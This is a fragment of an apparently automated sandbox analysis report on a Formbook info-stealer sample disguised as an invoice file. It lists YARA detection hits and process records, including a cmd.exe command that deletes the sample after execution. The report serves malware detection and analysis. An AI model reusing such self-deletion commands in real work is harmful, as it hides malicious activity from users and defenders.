                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:moderate

                        General

                        Start time:18:22:08
                        Start date:13/10/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'
                        Imagebase:0x11d0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:18:22:09
                        Start date:13/10/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff724c50000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis
